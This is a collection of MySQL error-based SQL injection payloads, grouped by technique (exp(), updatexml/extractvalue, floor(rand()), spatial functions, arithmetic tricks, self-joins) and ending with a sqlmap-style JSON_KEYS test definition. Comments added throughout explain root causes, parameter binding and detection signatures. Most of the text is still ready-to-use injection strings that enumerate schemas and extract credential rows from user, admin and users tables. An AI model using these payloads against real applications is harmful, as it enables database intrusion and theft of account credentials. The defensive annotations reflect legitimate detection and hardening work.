1.exp() MySQL>=5.5.5
-- Section 1: exp()-wrapped subqueries (MySQL >= 5.5.5 per the heading above).
-- Defender notes that apply to every line of this section:
--   * The part that matters is always the innermost SELECT: user(), database(), version(),
--     information_schema.tables / .columns / .schemata, or a row of a table named `user`
--     (host, user, password). The surrounding exp(~( ... )) is only the carrier; this is the
--     error-based family that section 7 below labels explicitly.
--   * Root cause: a numeric parameter (pid, or the leading "1" of the fragments) concatenated
--     into the statement. Binding it with a placeholder removes the whole section; in addition,
--     never forward raw DBMS error text to the client, since that is the channel this family
--     depends on.
--   * Detection: "exp(~(select" together with information_schema or user()/database() inside a
--     request parameter is a high-signal, low-false-positive pattern for WAF or log rules.
select * from products where pid=1 and exp(~(select * from(select user())a));
-- From here on the lines are injection fragments rather than standalone statements; the
-- trailing "--" or "#" is a comment marker that discards the remainder of the host query.
-- 0x7c is "|", used as a field separator between the concatenated values.
-- convert(... using latin1) on the next line is presumably a charset-coercion tweak — confirm.
1 and exp(~(select*from(select convert(concat(database(),0x7c,user(),0x7c,version())using latin1))a))--
-- Schema enumeration through information_schema: table names of the current database, then
-- column names of a chosen table.
1 and exp(~(select*from(select group_concat(table_name)from information_schema.tables where table_schema=database())a))--
1 and exp(~(select*from(select group_concat(column_name)from information_schema.columns where table_name='user')a))--
-- Direct row read (host | user | password) from a table named `user`: the schema is already
-- known at this point. Credential material leaving the database in an error message is the
-- point at which incident response should treat every account in that table as exposed.
1 and exp(~(select*from(select concat(host,0x7c,user,0x7c,password)from user limit 0,1)a))--
-- User-variable forms (@a:=, @b:=). "{a information_schema.schemata}" is MySQL's brace
-- (ODBC-style escape) syntax around the table reference; filters that look for the bare
-- table name may not normalise it. 'uat_db_web' below is a page-specific sample schema name.
1 and exp(~(select*from(select @a:=(select @b:=schema_name from{a information_schema.schemata} limit 0,1))a))#
1 and exp(~(select*from(select @a:=schema_name from{a information_schema.schemata} limit 0,1)a))#
1 and exp(~(select*from(select @a:=(select @b:=table_name from{a information_schema.tables} where table_schema='uat_db_web' limit 1,1))a))#
2.函数extractvalue(),updatexml() MySQL>=5.1.5
-- Section 2: updatexml() / extractvalue() variants (MySQL >= 5.1.5 per the heading).
-- The function names are backtick-quoted and separated from "(" by a space, presumably to
-- slip past filters that match the literal "updatexml(" / "extractvalue(" — normalise
-- whitespace and strip identifier quotes before any signature match. 0x7e is "~", used as a
-- marker around the echoed value. The "1' and ... or'" shape targets a string-quoted
-- parameter; the fix is the same as in section 1: bind the parameter, do not concatenate it.
1' and `updatexml` (1,concat(0x7e,database()),1)or'
1' and `extractvalue` (1,concat(0x7e,database()),1)or'
3.函数floor()
-- Section 3: floor(rand(0)*2) grouping variants. Common shape:
--   select count(*), concat(<value>, floor(rand(0)*2)) x from information_schema.tables group by x
-- where <value> is whatever the attacker wants echoed back: version(), user(), database(),
-- @@datadir, or a row of a table named `admin`.
-- @@datadir is a server system variable (the data directory path); its appearance inside a
-- request parameter is suspicious on its own, as application SQL rarely reads it from input.
-- 0x7e7e is "~~" (a delimiter), 0x7c is "|", 0x3a is ":".
-- Some lines are fragments: unbalanced parentheses and the missing space in "limit0,1" are
-- kept exactly as they appear on the page.
and (select 1 from (select count(*),concat(0x7e7e,version(),0x7c,user(),0x7c,database(),0x7c,@@datadir,0x7e7e,floor(rand(0)*2))x from information_schema.tables group by x)a);
-- Direct credential read (username:password:encrypt:roleid) from `admin`.
and (select 1 from (select count(*),concat(0x7e7e,(select concat(username,0x3a,password,0x3a,encrypt,0x3a,roleid) from admin limit0,1),0x7e7e,floor(rand(0)*2))x from information_schema.tables group by x)a);
and select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)
-- Minimal form, grouping on a table the attacker already knows.
select count(*) from admin group by concat(version(),floor(rand(0)*2));
-- Full host statement showing where the fragment lands (id=1 concatenated, not bound).
select * from user where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
4.GeometryCollection(),multipoint(),polygon(),multipolygon(),linestring(),multilinestring()
-- Section 4: spatial-function variants. geometrycollection(), multipoint(), polygon(),
-- multipolygon(), linestring() and multilinestring() are each fed the same doubly-nested
-- SELECT of user(); only the outer function name changes.
-- Detection consequence: a signature keyed on one function name misses its siblings. Match on
-- the "(select * from(select * from(select" nesting instead, or — better — enforce parameter
-- binding at the application layer so the host query cannot be extended at all.
select * from products where pid=1 and geometrycollection((select * from(select * from(select user())a)b));
select * from products where pid=1 and multipoint((select * from(select * from(select user())a)b));
select * from products where pid=1 and polygon((select * from(select * from(select user())a)b));
select * from products where pid=1 and multipolygon((select * from(select * from(select user())a)b));
select * from products where pid=1 and linestring((select * from(select * from(select user())a)b));
select * from products where pid=1 and multilinestring((select * from(select * from(select user())a)b));
-- The next two lines pass an already-known column name as the argument; the original
-- (Chinese) note says this leaks the current database / table name.
select name from member where num=1 and polygon(已知列名)----爆出当前库/表名
select name from member where num=1 and linestring(已知列名)----爆出当前库/表名
5.~ MySQL>=5.5.5 && not suitable for MariaDB
-- Section 5: "!( ... )-~0" arithmetic forms (MySQL >= 5.5.5; the heading states they are not
-- suitable for MariaDB). A subquery is negated with "!", optionally wrapped in atan()/log()/
-- floor(), and combined with ~0 — both as a standalone SELECT and as a "' or ... or '"
-- fragment aimed at a string-quoted parameter. Because the wrapping function is
-- interchangeable, defend on the absence of binding rather than on function names.
select ~0+!(select*from(select user())x);
select !(select*from(select user())x)-~0;
select (select(!x-~0)from(select(select user())x)a);
select (select!x-~0.from(select(select user())x)a);
' or !(select*from(select user())x)-~0 or '
-- Host statement showing the fragment landing inside a quoted predicate on mysql.user.
select host from mysql.user where 1='' or !(select*from(select user())x)-~0 or '' ;
-- atan() / log() / floor() wrappers: same payload, different outer function.
select !atan((select*from(select user())a))-~0;
' or !atan((select*from(select user())a))-~0 or '
select !log((select*from(select user())a))-~0;
' or !log((select*from(select user())a))-~0 or '
select !floor((select*from(select user())a))-~0;
' or !floor((select*from(select user())a))-~0 or '
-- Schema walk, one value per call: a table name, a column name of `users`, then one row
-- of `users` (id:username:password) via concat_ws.
select !(select*from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x)-~0
select !(select*from(select column_name from information_schema.columns where table_name='users' limit 0,1)x)-~0;
select !(select*from(select concat_ws(':',id, username, password) from users limit 0,1)x)-~0;
-- Accumulator forms: a user variable "@" is grown inside count(*) over information_schema
-- .columns (0xa = newline, 0x3a3a = "::") so that the table/column names of the whole current
-- database come back in a single response. One request that returns many names is a sign of
-- exfiltration rather than probing and should be escalated accordingly.
select !(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)-~0
select (select(!x-~0)from(select(concat (@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat (@,0xa,table_name,0x3a3a,column_name)),@))x)a)
select (select!x-~0.from(select(concat (@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat (@,0xa,table_name,0x3a3a,column_name)),@))x)a)
6.other
-- Section 6: miscellaneous forms.
-- Self-join enumeration: "member as a join member as b [using(...)]" with an ever-longer
-- using() list reveals one column name per request. The original (Chinese) notes record the
-- expected result of each step: 1st column num, 2nd column name, 3rd column birthday.
-- No information_schema access is involved, so rules that only watch information_schema
-- will not see this; the tell is the table self-joined with itself inside a predicate.
select name from member where num=1 and (select*from(select*from member as a join member as b)as c)----爆出第1列列名num
select name from member where num=1 and (select*from(select*from member as a join member as b using(num))as c)----爆出第2列列名name
select name from member where num=1 and (select*from(select*from member as a join member as b using(num,name))as c)----爆出第3列列名birthday
-- "num=1-a()" calls a function that does not exist; the original note says the resulting
-- error leaks the current database name — another reason not to surface DBMS errors.
select name from member where num=1-a()----爆出当前库名
-- Likely an integer-overflow probe (no table access needed): cheap fingerprinting that an
-- IDS can still flag, since a legitimate application never multiplies two such literals.
select 9999999999*9999999999;
7.JSON
<!-- Section 7: a payload definition in the XML layout used by automated injection testers
     (it resembles sqlmap's payload files). Read from the defender's side:
     - dbms / dbms_version: MySQL >= 5.7, because the carrier function is JSON_KEYS().
     - vector / payload: JSON_KEYS over CONVERT(... USING UTF8) of a string that sandwiches a
       MAKE_SET([RANDNUM]=[RANDNUM],1) probe between [DELIMITER_START] and [DELIMITER_STOP];
       the bracketed tokens are tool placeholders substituted at run time.
     - response / grep: the result is regex-captured from the HTTP response between the two
       delimiters, i.e. the technique requires DBMS error text to reach the client. Suppressing
       verbose database errors in responses and binding parameters each defeat it.
     - clause "1,2,3" and where "1" presumably encode the injectable clauses / positions in
       the tool's schema (the title names WHERE, HAVING, ORDER BY, GROUP BY); left as-is. -->
<test>
<title>MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS FUNCTION)</title>
<stype>2</stype>
<level>1</level>
<risk>0</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))USING UTF8)))</vector>
<request>
<payload>AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))USING UTF8)))</payload>
</request>
<!-- The named group "result" is what the tester reads back; if the application never echoes
     DBMS errors, this pattern does not match and the test reports nothing. -->
<response>
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>>= 5.7</dbms_version>
</details>
</test>